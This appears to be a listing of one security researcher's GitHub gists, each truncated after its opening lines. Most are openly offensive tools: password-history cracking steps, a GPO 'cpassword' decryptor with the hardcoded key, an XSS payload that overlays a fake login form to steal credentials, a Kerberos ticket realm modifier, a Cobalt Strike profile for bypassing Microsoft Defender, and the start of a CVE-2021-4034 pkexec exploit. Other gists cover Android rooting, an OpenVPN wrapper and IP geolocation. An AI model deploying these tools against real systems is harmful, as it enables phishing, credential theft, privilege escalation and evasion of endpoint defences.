@tothi
tothi / PwnHistory.md
Created September 17, 2021 21:33
Combine cracked historical passwords with numbers in order to crack the current ones

Attacking user behaviour as a consequence of forced regular password change

Let's assume we are using ophcrack to crack NT hashes in pwdump format, where the pwdump also includes the password history hashes. Assume we have already cracked several of the hashes in the history.

Steps for getting more passwords cracked (assuming users just increment, decrement or otherwise edit the numbers at the end of their passwords on each policy-forced password change):

  1. Get cracked passwords (including history):
cat ophcrack.pwdump | grep -v ':::$' | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
@tothi
tothi / gpo-decrypt.py
Created October 10, 2021 22:56
Decrypt "cpassword" found in GPO configs
#!/usr/bin/env python3
import sys
from base64 import b64decode
from Crypto.Cipher import AES
def decrypt(cpass):
    key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8' \
          b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
    iv = b'\x00' * 16
@tothi
tothi / xss-phisher.js
Created November 3, 2021 02:50
XSS Phishing Payload
var html = `
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\">
</div>
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\">
<p>An error occurred. Please login again.</p>
<form id=\"phishingForm\"">
<p>Username <input type=\"text\" name=\"username\"></p>
<p>Password <input type=\"password\" name=\"password\"></p>
<p><input type=\"submit\" value=\"Login\"></p>
</form>
@tothi
tothi / setKerbRealm.py
Created November 25, 2021 16:46
This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#!/usr/bin/env python
#
# This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#
from pyasn1.codec.der import decoder, encoder
from impacket.krb5.asn1 import KRB_CRED, Ticket, seq_set_iter
from impacket.krb5 import types
@tothi
tothi / minimal-defender-bypass.profile
Last active August 15, 2025 09:08
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@tothi
tothi / upgrade_LineageOS_with_Magisk.md
Last active March 11, 2026 13:35
Upgrading LineageOS and reinstalling Magisk

Upgrade LineageOS with Magisk

WARNING: tested only on my setup (LineageOS 18.1 on instantnoodle), other setups may break and brick the device!

Step-by-step instructions (for reinstalling patched boot.img for Magisk):

  1. upgrade LineageOS to the latest by the standard way in Android GUI (download + install + reboot)
  2. if not using the latest Magisk: wipe the old (possibly hidden) Magisk app, then install the up-to-date one from the official Magisk GitHub repo
  3. install (git clone) payload_dumper from GitHub (in Termux or in an SSH session on the Android device) for the 1st time, or update (git pull) later
  4. in the Android terminal session: wget the same LineageOS nightly image installed in step 1 from https://download.lineageos.org/
@tothi
tothi / blasty-vs-pkexec-mod.c
Last active July 16, 2025 04:34
CVE-2021-4034
/*
* blasty-vs-pkexec-mod.c -- by blasty <[email protected]>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
@tothi
tothi / openvpn2-dynamic-challenge-wrapper.sh
Created January 31, 2022 17:04
Wrapper script for OpenVPN version 2.x clients for supporting Dynamic Challenge (OTP) authentication
#!/bin/bash
#
# openvpn2 wrapper for supporting Dynamic Challenge (in openvpn 2.x)
#
# Dynamic Challenge:
# CRV1:<FLAGS>:<STATE_ID>:<BASE64_USERNAME>:<CHALLENGE_TEXT>
# Dynamic Challenge response:
# Username: [username decoded from the challenge, which probably equals the original username]
# Password: CRV1::<STATE_ID>::<RESPONSE_TEXT>
@tothi
tothi / ip_to_geo_map.md
Last active March 6, 2022 13:48
Draw geolocation map from list of IP addresses

Creating geolocation heatmap from a list of IP addresses

Source IP set is proxies.txt.

Generate KML with geolocation coordinates using the tool geoiplookup from MaxMind (free db from MaxMind may be needed):

cat proxies.txt | \
  awk '{ cmd="/usr/bin/geoiplookup "$1" | tr '\''\n'\'' '\''|'\''"; 
         cmd | getline res; print $1"|"res; close(cmd) }' \
 > proxies_geo.csv
@tothi
tothi / magisk_ramdisk_patch_avd.sh
Last active April 9, 2026 12:11
Apply Magisk patches on AVD (Android Emulator) RAMDISK images for running Magisk (root) on Android Emulators
#!/bin/bash
#
# patch ramdisk.img (for installing Magisk on x64 Android emulator)
#
# x86_64 on Android 12 (API Level 32) is supported/tested currently
#
# install AVD:
#
# sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64'